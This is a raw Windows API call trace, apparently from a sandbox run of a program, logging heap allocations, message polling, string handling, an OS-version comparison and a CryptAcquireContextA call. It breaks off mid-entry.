[0201.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0201.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0201.095] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0201.095] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0201.095] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0201.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0201.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0201.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0201.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0201.095] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0201.095] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0201.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0201.096] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0201.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0201.096] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0201.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0201.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0201.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0201.096] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0201.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0201.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0201.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0201.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0201.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0201.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9df8 [0201.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0201.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0201.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0201.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0201.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0201.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0201.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0201.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0201.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0201.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0201.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0201.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0201.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0201.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0201.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0201.098] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0201.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0201.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0201.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0201.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0201.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0201.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0201.098] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0201.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0201.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0201.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0201.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0201.098] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0201.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0201.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0201.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0201.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0201.099] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0201.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0201.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0201.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0201.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0201.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0201.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0201.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0201.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0201.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0201.099] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0201.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0201.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0201.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0201.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0201.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0201.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0201.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0201.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0201.099] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0201.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0201.100] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0201.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0201.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0201.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0201.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0201.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0201.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0201.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0201.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0201.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0201.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0201.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0201.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0201.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0201.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0201.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0201.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0201.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0201.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0201.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0201.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0201.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0201.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0201.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0201.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0201.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0201.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0201.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0201.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0201.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0201.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0201.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0201.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0201.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0201.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0201.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0201.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0201.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0201.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0201.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0201.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0201.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0201.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0201.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0201.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0201.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0201.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0201.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0201.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0201.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0201.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0201.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0201.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0201.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0201.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0201.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0201.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.106] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0201.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0201.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0201.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0201.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0201.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0201.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0201.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0201.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0201.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0201.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0201.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0201.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0201.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0201.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0201.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0201.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0201.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0201.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0201.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0201.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0201.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0201.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0201.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0201.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0201.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0201.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0201.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0201.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0201.108] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0201.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0201.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0201.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0201.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0201.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0201.109] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0201.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0201.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0201.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0201.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0201.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0201.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0201.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0201.109] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad63f8) returned 1 [0201.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0201.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0201.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0201.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0201.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0201.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0201.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0201.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0201.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0201.111] HeapFree (in: hHeap=0x25c0000, 